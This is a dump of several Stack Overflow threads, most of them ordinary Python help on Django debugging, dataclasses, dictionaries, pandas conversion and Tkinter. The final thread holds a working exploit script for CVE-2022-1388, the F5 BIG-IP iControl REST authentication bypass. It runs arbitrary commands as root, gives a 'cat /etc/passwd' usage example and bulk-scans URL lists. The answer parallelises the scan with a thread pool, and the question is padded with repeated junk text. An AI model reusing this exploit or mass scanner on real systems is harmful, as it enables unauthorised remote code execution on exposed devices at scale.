Laravel's dd() equivalent in django
I am new in Django and having a hard time figuring out how to print what an object have inside. I mean type and value of the variable with its members inside. Just like Laravel's dd(object) function. Laravel's dd() is a handy tool for debugging the application. I have searched for it. But found nothing useful. I have tried pprint(), simplejson, print(type(object) and {% debug %}. But none of them could provide the required information about an object. Here is a sample output from Laravel's dd() function. In this Image, I am printing the request object of Laravel. as you can see its showing complete information about an object. I mean name of class it belongs to, its member variables. also with its class name and value. and it keeps digging deep inside the object and prints all the information. But I am not able to find a similar tool in Django. That's hard to believe that Django doesn't have such a useful tool. Therefore I would like to know about any third party package that can do the trick. I am using Django version 2.0.5. and trying to print django.contrib.messages Also, I want the output to be displayed in the browser, not in the console. In a well readable way that's why I am asking for a Django package that can take in the object and render a well-formed presentation of object architecture.
[ "You are looking for __dict__ property or dir()\nprint(object.__dict__)\n\nUse pprint for beautified output\nfrom pprint import pprint\npprint(dir(object))\n\n", "Raise an exception. Assuming you've got debug on you'll see the exception message. It's crude but it's helped me in the past. \nJust:\n raise Exception(\"I want to know the value of this: \" + myvariable_as_a_string)\n\nOther answers & commenters ignored the crucial \"and die\" part of the dd() function, which prevents things like subsequent redirects. \n", "Actually Django does not provide this specialized function. So in order to get rid of this problem, I made a custom dd() type function and use this in all Django projects. Perhaps it can help someone. \nLet's assume, we have a library folder named app_libs and in that folder we have a library file named dump.py. Like app_libs > dump.py:\nfrom django.core import serializers\nfrom collections.abc import Iterable\nfrom django.db.models.query import QuerySet\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef dd(request, data=''):\n try:\n scheme = request.scheme\n server_name = request.META['SERVER_NAME']\n server_port = request.META['SERVER_PORT']\n remote_addr = request.META['REMOTE_ADDR']\n user_agent = request.META['HTTP_USER_AGENT']\n path = request.path\n method = request.method\n session = request.session\n cookies = request.COOKIES\n\n get_data = {}\n for key, value in request.GET.lists():\n get_data[key] = value\n\n post_data = {}\n for key, value in request.POST.lists():\n post_data[key] = value\n\n files = {}\n for key, value in request.FILES.lists():\n files['name'] = request.FILES[key].name\n files['content_type'] = request.FILES[key].content_type\n files['size'] = request.FILES[key].size\n\n dump_data = ''\n query_data = ''\n executed_query = ''\n if data:\n if isinstance(data, Iterable):\n if isinstance(data, QuerySet):\n executed_query = data.query\n query_data = serializers.serialize('json', data)\n else:\n dump_data = dict(data)\n else:\n query_data = serializers.serialize('json', [data])\n\n\n msg = f'''\n <html>\n <span style=\"color: red;\"><b>Scheme</b></span> : <span style=\"color: blue;\">{scheme}</span><br>\n <span style=\"color: red;\"><b>Server Name</b></span> : <span style=\"color: blue;\">{server_name}</span><br>\n <span style=\"color: red;\"><b>Server Port</b></span> : <span style=\"color: blue;\">{server_port}</span><br>\n <span style=\"color: red;\"><b>Remote Address</b></span>: <span style=\"color: blue;\">{remote_addr}</span><br>\n <span style=\"color: red;\"><b>User Agent</b></span> : <span style=\"color: blue;\">{user_agent}</span><br>\n <span style=\"color: red;\"><b>Path</b></span> : <span style=\"color: blue;\">{path}</span><br>\n <span style=\"color: red;\"><b>Method</b></span> : <span style=\"color: blue;\">{method}</span><br>\n <span style=\"color: red;\"><b>Session</b></span> : <span style=\"color: blue;\">{session}</span><br>\n <span style=\"color: red;\"><b>Cookies</b></span> : <span style=\"color: blue;\">{cookies}</span><br>\n <span style=\"color: red;\"><b>Get Data</b></span> : <span style=\"color: blue;\">{get_data}</span><br>\n <span style=\"color: red;\"><b>Post Data</b></span> : <span style=\"color: blue;\">{post_data}</span><br>\n <span style=\"color: red;\"><b>Files</b></span> : <span style=\"color: blue;\">{files}</span><br>\n <span style=\"color: red;\"><b>Executed Query</b></span>: <span style=\"color: blue;\"><br>{executed_query}</span><br>\n <span style=\"color: red;\"><b>Query Data</b></span> : <span style=\"color: blue;\"><br>{query_data}</span><br>\n <span style=\"color: red;\"><b>Dump Data</b></span> : <span style=\"color: blue;\"><br>{dump_data}</span><br>\n </html>\n '''\n\n return msg\n except ObjectDoesNotExist:\n return False\n\nwhen you need to use this function, just call it like this in any views.py:\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom app_libs.dump import dd\nfrom .models import Products\n\nclass ProductView(View):\n def get(self, request):\n data = {}\n data['page_title'] = 'products'\n data['products'] = Products.objects.get_all_product()\n\n template = 'products/collections.html'\n\n dump_data = dd(request, data['products'])\n return HttpResponse(dump_data)\n\n # return render(request, template, data)\n\nthat's it.\n", "You can set breakpoint just after variable you need to inspect.\n\n# for example your code looks like\n...other code\nproducts = Product.objects.all()\n# here you set a breakpoint\nbreakpoint()\n...other code\nNow you need to call you code in this exact location and due to breakpoint it stops.\nThen you want to look up in terminal, it switched to special mode where you need to \nenter code like this one:\nproducts.__dict__ # and hit enter. Now you'll see all properties in your variable.\n\n", "I was looking for something similar and there is this python package django-dump-die that provides exactly this, it was inspired from laravel.\nhttps://pypi.org/project/django-dump-die/0.1.5/\n" ]
[ 6, 3, 3, 0, 0 ]
[]
[]
[ "debugging", "django", "flask", "laravel", "python" ]
stackoverflow_0050553820_debugging_django_flask_laravel_python.txt
Q: How to make only one expected value in Pydantic dataclass I'm trying to make one or more expected values non-literal. But I get error TypeError: non-default argument 'breakdownAccount' follows default argument. This example raised error: @dataclass class DataInclude: currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"] open: bool = True accountType: Literal["Текущий счет"] currencyCode: Literal[810, 826, 756, 978, 840, 51, 156] currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF'] This example working: @dataclass class DataInclude: currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"] open: bool accountType: Literal["Текущий счет"] currencyCode: Literal[810, 826, 756, 978, 840, 51, 156] currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF'] How can I put in expected values if they are static? I use all this for API autotests I have searched everywhere for this information. A: Fields without default values cannot appear after fields with default values. Declare the open field as the last one. from typing import Literal from dataclasses import dataclass @dataclass class DataInclude: currencyAccount: Literal[ "CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет", ] accountType: Literal["Текущий счет"] currencyCode: Literal[810, 826, 756, 978, 840, 51, 156] currency: Literal["CNY", "AMD", "RUB", "USD", "EUR", "GBP", "CHF"] open: bool = True
How to make only one expected value in Pydantic dataclass
I'm trying to make one or more expected values non-literal. But I get error TypeError: non-default argument 'breakdownAccount' follows default argument. This example raised error: @dataclass class DataInclude: currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"] open: bool = True accountType: Literal["Текущий счет"] currencyCode: Literal[810, 826, 756, 978, 840, 51, 156] currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF'] This example working: @dataclass class DataInclude: currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"] open: bool accountType: Literal["Текущий счет"] currencyCode: Literal[810, 826, 756, 978, 840, 51, 156] currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF'] How can I put in expected values if they are static? I use all this for API autotests I have searched everywhere for this information.
[ "Fields without default values cannot appear after fields with default values.\nDeclare the open field as the last one.\nfrom typing import Literal\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass DataInclude:\n currencyAccount: Literal[\n \"CNY счет\",\n \"AMD счет\",\n \"RUB счет\",\n \"USD счет\",\n \"EUR счет\",\n \"GBP счет\",\n \"CHF счет\",\n ]\n accountType: Literal[\"Текущий счет\"]\n currencyCode: Literal[810, 826, 756, 978, 840, 51, 156]\n currency: Literal[\"CNY\", \"AMD\", \"RUB\", \"USD\", \"EUR\", \"GBP\", \"CHF\"]\n open: bool = True\n\n" ]
[ 1 ]
[]
[]
[ "automated_tests", "pydantic", "python" ]
stackoverflow_0074592440_automated_tests_pydantic_python.txt
Q: How to Construct Method and Attributes using Dictionaries in Python class print_values: def __init__(self,username,user_email,displayname): self.name= username self.email=user_email self.DisplayName=displayname def printing_content(self): print(f"UserName: {self.name}\n" f"UserEmail: {self.email}\n" f"UserDisplayName:{self.DisplayName}\n") user_one={'username':'userone', 'useremail':'userone@gmail.com', 'displayname':'User One'} user_two={'username':'usertwo', 'useremail':'usertwo@gmail.com', 'displayname':'User Two'} user_three={'username':'userthree', 'useremail':'userthree@gmail.com', 'displayname':'User Three'} users_list=['user_one','user_two','user_three'] obj_name=print_values(user_one['username'],user_one['useremail'],user_one['displayname']) obj_name.printing_content() It's working fine, as am getting output as below UserName: userone UserEmail: userone@gmail.com UserDisplayName:User One Here am only using user_one dict, i want to do the same for multiple dict. I have tried adding the dict names in list and try to loop through them, like below for item in user_list: obj_name=print_values(item['username'],item['useremail'],item['displayname']) obj_name.printing_content() But am getting below error obj_name=print_values(item['username'],item['useremail'],item['displayname']) TypeError: string indices must be integers Any one do let me know what am i missing or anyother idea to get this done. Thanks in advance! A: This is because in users_list=['user_one', 'user_two', 'user_three'] you enter the variable name as a string. class print_values: def __init__(self,username,user_email,displayname): self.name= username self.email=user_email self.DisplayName=displayname def printing_content(self): print(f"UserName: {self.name}\n" f"UserEmail: {self.email}\n" f"UserDisplayName:{self.DisplayName}\n") user_one={'username':'userone', 'useremail':'userone@gmail.com', 'displayname':'User One'} user_two={'username':'usertwo', 'useremail':'usertwo@gmail.com', 'displayname':'User Two'} user_three={'username':'userthree', 'useremail':'userthree@gmail.com', 'displayname':'User Three'} users_list=[user_one,user_two,user_three] # edited obj_name=print_values(user_one['username'],user_one['useremail'],user_one['displayname']) obj_name.printing_content() for item in users_list: obj_name=print_values(item['username'],item['useremail'],item['displayname']) obj_name.printing_content() Explanation Your users_list=['user_one', 'user_two', 'user_three'] is a string containing the variable names as the string. When you loop on user_list for item in user_list: Here item is not the user_one, or user_two as a variable but these are as the string means 'user_one', or 'user_two', so when you try to get values like item['username'], here you got the error because the item is not a dictionary or json or ..., but it is a string here, you can get the only provide an integer inside these brackets [], like 1, 2, 3, 4,..., ∞. I hope you understand well. Thanks. Don't make a dictionary for every user. Use this code class Users: def __init__(self) -> None: self.userList = [] def addUser(self, user): self.userList.append(user) class User: def __init__(self, username, email, name) -> None: self.username = username self.email = email self.name = name def __str__(self) -> str: return f"Username = {self.username}\nEmail = {self.email}\nName = {self.name}\n" users = Users() users.addUser(User("username1", "email1", "name1")) users.addUser(User("username2", "email2", "name2")) # First way of printing for user in users.userList: print(user) # Printing user directly prints the formatted output # Because I have changed the magic `__str__` method in user class # You can return anything('string data type only') in __str__ it will print when you print the class object. # Second way of printing. for user in users.userList: print("Username = " + user.username) print("Email = " + user.email) print("Name = " + user.name) print() # for adding one extra line
How to Construct Method and Attributes using Dictionaries in Python
class print_values: def __init__(self,username,user_email,displayname): self.name= username self.email=user_email self.DisplayName=displayname def printing_content(self): print(f"UserName: {self.name}\n" f"UserEmail: {self.email}\n" f"UserDisplayName:{self.DisplayName}\n") user_one={'username':'userone', 'useremail':'userone@gmail.com', 'displayname':'User One'} user_two={'username':'usertwo', 'useremail':'usertwo@gmail.com', 'displayname':'User Two'} user_three={'username':'userthree', 'useremail':'userthree@gmail.com', 'displayname':'User Three'} users_list=['user_one','user_two','user_three'] obj_name=print_values(user_one['username'],user_one['useremail'],user_one['displayname']) obj_name.printing_content() It's working fine, as am getting output as below UserName: userone UserEmail: userone@gmail.com UserDisplayName:User One Here am only using user_one dict, i want to do the same for multiple dict. I have tried adding the dict names in list and try to loop through them, like below for item in user_list: obj_name=print_values(item['username'],item['useremail'],item['displayname']) obj_name.printing_content() But am getting below error obj_name=print_values(item['username'],item['useremail'],item['displayname']) TypeError: string indices must be integers Any one do let me know what am i missing or anyother idea to get this done. Thanks in advance!
[ "This is because in users_list=['user_one', 'user_two', 'user_three'] you enter the variable name as a string.\nclass print_values:\n def __init__(self,username,user_email,displayname):\n self.name= username\n self.email=user_email\n self.DisplayName=displayname\n def printing_content(self):\n print(f\"UserName: {self.name}\\n\"\n f\"UserEmail: {self.email}\\n\"\n f\"UserDisplayName:{self.DisplayName}\\n\")\n\nuser_one={'username':'userone',\n 'useremail':'userone@gmail.com',\n 'displayname':'User One'}\n\nuser_two={'username':'usertwo',\n 'useremail':'usertwo@gmail.com',\n 'displayname':'User Two'}\n\nuser_three={'username':'userthree',\n 'useremail':'userthree@gmail.com',\n 'displayname':'User Three'}\n\nusers_list=[user_one,user_two,user_three] # edited\n\n\nobj_name=print_values(user_one['username'],user_one['useremail'],user_one['displayname'])\n\nobj_name.printing_content()\n\n\nfor item in users_list:\n obj_name=print_values(item['username'],item['useremail'],item['displayname'])\n obj_name.printing_content()\n\n\nExplanation\nYour users_list=['user_one', 'user_two', 'user_three'] is a string containing the variable names as the string. When you loop on user_list\nfor item in user_list:\n\nHere item is not the user_one, or user_two as a variable but these are as the string means 'user_one', or 'user_two', so when you try to get values like item['username'], here you got the error because the item is not a dictionary or json or ..., but it is a string here, you can get the only provide an integer inside these brackets [], like 1, 2, 3, 4,..., ∞.\nI hope you understand well. Thanks.\n\nDon't make a dictionary for every user.\nUse this code\nclass Users:\n\n def __init__(self) -> None:\n self.userList = []\n\n def addUser(self, user):\n self.userList.append(user)\n\n\n\n\nclass User:\n\n def __init__(self, username, email, name) -> None:\n self.username = username\n self.email = email\n self.name = name\n\n def __str__(self) -> str:\n return f\"Username = {self.username}\\nEmail = {self.email}\\nName = {self.name}\\n\"\n \n\nusers = Users()\n\n\nusers.addUser(User(\"username1\", \"email1\", \"name1\"))\nusers.addUser(User(\"username2\", \"email2\", \"name2\"))\n\n\n\n# First way of printing\nfor user in users.userList:\n print(user) # Printing user directly prints the formatted output\n # Because I have changed the magic `__str__` method in user class\n # You can return anything('string data type only') in __str__ it will print when you print the class object.\n# Second way of printing.\n\nfor user in users.userList:\n print(\"Username = \" + user.username)\n print(\"Email = \" + user.email)\n print(\"Name = \" + user.name)\n print() # for adding one extra line\n\n\n" ]
[ 1 ]
[]
[]
[ "dictionary", "list", "loops", "python", "python_3.x" ]
stackoverflow_0074592665_dictionary_list_loops_python_python_3.x.txt
Q: Python crashes without errors My python code crashes without providing any exceptions. The code uses Tkinter, socket programming, pyvisa, thread, and modules. It is an automated sensor calibration system using python. The code runs on a Windows 10 machine with python version 2.7.16 It is not crashing at a fixed point. The crash is random. 6/10 times the code completes the process, rest it crashes without error. When I use python trace, I can tell with certainty that 10/10 it successful. When I convert this code into an executable file using auto-py-to-exe, the number of times the crash happens reduces. Now the problem is I need to find out the cause of the issue and then export this code into an executable file. Can someone guide me as to how I can figure out the issue? Also, I run the trace from the command line, is there a way to include this trace in the script so that when I convert the code to an executable I can check if it is crashing. A: maybe you forgot to add tkinter.mainloop() at the end of your code, cause tkinter.mainloop() tells Python to run the Tkinter event loop. This method listens for events, such as button clicks or keypresses
Python crashes without errors
My python code crashes without providing any exceptions. The code uses Tkinter, socket programming, pyvisa, thread, and modules. It is an automated sensor calibration system using python. The code runs on a Windows 10 machine with python version 2.7.16 It is not crashing at a fixed point. The crash is random. 6/10 times the code completes the process, rest it crashes without error. When I use python trace, I can tell with certainty that 10/10 it successful. When I convert this code into an executable file using auto-py-to-exe, the number of times the crash happens reduces. Now the problem is I need to find out the cause of the issue and then export this code into an executable file. Can someone guide me as to how I can figure out the issue? Also, I run the trace from the command line, is there a way to include this trace in the script so that when I convert the code to an executable I can check if it is crashing.
[ "maybe you forgot to add tkinter.mainloop() at the end of your code, cause tkinter.mainloop() tells Python to run the Tkinter event loop. This method listens for events, such as button clicks or keypresses\n" ]
[ 0 ]
[ "Have you tried the --debug option when using auto-py-to-exe?\nSee the blog post about tool usage, especially the debug section\nhttps://nitratine.net/blog/post/issues-when-using-auto-py-to-exe/?utm_source=auto_py_to_exe&utm_medium=readme_link&utm_campaign=auto_py_to_exe_help\n" ]
[ -1 ]
[ "crash", "python", "trace" ]
stackoverflow_0062421601_crash_python_trace.txt
Q: How can I convert an object to float? code dataframe I tried making a boxplot for 'horsepower', but it shows up as an object type, so I tried converting it to float but it displays that error. A: The column horsepower seems to hold some non numeric values. I suggest you, in this case, to use pandas.to_numeric instead of pandas.Series.astype. Replace this : df_T['horsepower']= df_T['horsepower'].astype(float) By this : df_T['horsepower']= pd.to_numeric(df_T['horsepower'], errors= 'coerce') If ‘coerce’, then invalid parsing will be set as NaN.
How can I convert an object to float?
code dataframe I tried making a boxplot for 'horsepower', but it shows up as an object type, so I tried converting it to float but it displays that error.
[ "The column horsepower seems to hold some non numeric values. I suggest you, in this case, to use pandas.to_numeric instead of pandas.Series.astype.\nReplace this :\ndf_T['horsepower']= df_T['horsepower'].astype(float)\n\nBy this :\ndf_T['horsepower']= pd.to_numeric(df_T['horsepower'], errors= 'coerce')\n\n\nIf ‘coerce’, then invalid parsing will be set as NaN.\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "object", "pandas", "python", "type_conversion" ]
stackoverflow_0074592693_dataframe_object_pandas_python_type_conversion.txt
Q: How to add multiprocessing into my script I wrote a pentest script? but dont know how to add multiprocessing there, can smb hrlp me? #!/usr/bin/env python3 # -*- encoding: utf-8 -*- def usage(): print("Eg: \n python3 CVE-2022-1388.py -u https://127.0.0.1") print(" python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'") print(" python3 CVE-2022-1388.py -f urls.txt") def poc(target): url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc payload = {"command": "run", "utilCmdArgs": "-c id"} try: res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False) if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text): print("[+] {} is vulnerable!!!".format(url)) return True else: print("[-] {} is not vulnerable.".format(url)) return False except Exception as e: print("[-] {} Exception: ".format(url) + e) pass def exp(target, command): url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)} try: res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False) if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text): print(res.json()['commandResult']) return True else: print("[-] {} is not vulnerable.".format(url)) return False except Exception as e: print("[-] {} Exception: ".format(url) + e) pass if __name__ == '__main__': parser = argparse.ArgumentParser( description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE") parser.add_argument('-u', '--url', type=str, help="vulnerability verification for individual websites") parser.add_argument('-c', '--command', type=str, help="command execution") parser.add_argument('-f', '--file', type=str, help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file") args = parser.parse_args() if len(sys.argv) == 3: if sys.argv[1] in ['-u', '--url']: poc(args.url) elif sys.argv[1] in ['-f', '--file']: if os.path.isfile(args.file) == True: with open(args.file) as target: urls = [] urls = target.read().splitlines() for url in urls: if poc(url) == True: with open("success.txt", "a+") as f: f.write(url + "\n") elif len(sys.argv) == 5: if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']): exp(args.url, args.command) else: parser.print_help() usage() I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 A: It appears that you are doing network requests and writing to a file. For this multithreading should be suitable. You need the following import: from multiprocessing.dummy import Pool If you wish to use multiprocessing instead, then: from multiprocessing import Pool It would appear that the only place where you have multiple jobs to run is for the --file option: ... # Previous lines omitted if len(sys.argv) == 3: if sys.argv[1] in ['-u', '--url']: poc(args.url) elif sys.argv[1] in ['-f', '--file']: if os.path.isfile(args.file) == True: with open(args.file) as target: ######## Start of Modified Code ########### """ urls = [] # This is unnecessary """ urls = target.read().splitlines() pool = Pool(len(urls)) # Open file just once. Use flag "a" if you # really want to append to an existing file: with open("success.txt", "w") as f: for idx, result in enumerate(pool.imap(poc, urls)): if result: f.write(urls[idx] + "\n") ######## End of Modified Code ########### elif len(sys.argv) == 5: if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']): exp(args.url, args.command) else: parser.print_help() usage()
How to add multiprocessing into my script
I wrote a pentest script? but dont know how to add multiprocessing there, can smb hrlp me? #!/usr/bin/env python3 # -*- encoding: utf-8 -*- def usage(): print("Eg: \n python3 CVE-2022-1388.py -u https://127.0.0.1") print(" python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'") print(" python3 CVE-2022-1388.py -f urls.txt") def poc(target): url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc payload = {"command": "run", "utilCmdArgs": "-c id"} try: res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False) if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text): print("[+] {} is vulnerable!!!".format(url)) return True else: print("[-] {} is not vulnerable.".format(url)) return False except Exception as e: print("[-] {} Exception: ".format(url) + e) pass def exp(target, command): url = requests.utils.urlparse(target).scheme + "://" + requests.utils.urlparse(target).netloc payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)} try: res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False) if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text): print(res.json()['commandResult']) return True else: print("[-] {} is not vulnerable.".format(url)) return False except Exception as e: print("[-] {} Exception: ".format(url) + e) pass if __name__ == '__main__': parser = argparse.ArgumentParser( description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE") parser.add_argument('-u', '--url', type=str, help="vulnerability verification for individual websites") parser.add_argument('-c', '--command', type=str, help="command execution") parser.add_argument('-f', '--file', type=str, help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file") args = parser.parse_args() if len(sys.argv) == 3: if sys.argv[1] in ['-u', '--url']: poc(args.url) elif sys.argv[1] in ['-f', '--file']: if os.path.isfile(args.file) == True: with open(args.file) as target: urls = [] urls = target.read().splitlines() for url in urls: if poc(url) == True: with open("success.txt", "a+") as f: f.write(url + "\n") elif len(sys.argv) == 5: if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']): exp(args.url, args.command) else: parser.print_help() usage() I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333I cant imagine how to do this 8912731827389123777777777777777777777777777777777777777777777777777123123133333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333
[ "It appears that you are doing network requests and writing to a file. For this multithreading should be suitable. You need the following import:\nfrom multiprocessing.dummy import Pool\n\nIf you wish to use multiprocessing instead, then:\nfrom multiprocessing import Pool\n\nIt would appear that the only place where you have multiple jobs to run is for the --file option:\n ... # Previous lines omitted\n if len(sys.argv) == 3:\n if sys.argv[1] in ['-u', '--url']:\n poc(args.url)\n elif sys.argv[1] in ['-f', '--file']:\n if os.path.isfile(args.file) == True:\n with open(args.file) as target:\n ######## Start of Modified Code ###########\n \"\"\"\n urls = [] # This is unnecessary\n \"\"\"\n urls = target.read().splitlines()\n pool = Pool(len(urls))\n # Open file just once. Use flag \"a\" if you\n # really want to append to an existing file:\n with open(\"success.txt\", \"w\") as f:\n for idx, result in enumerate(pool.imap(poc, urls)):\n if result:\n f.write(urls[idx] + \"\\n\")\n ######## End of Modified Code ###########\n elif len(sys.argv) == 5:\n if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):\n exp(args.url, args.command)\n else:\n parser.print_help()\n usage()\n\n" ]
[ 0 ]
[]
[]
[ "multiprocessing", "multithreading", "python" ]
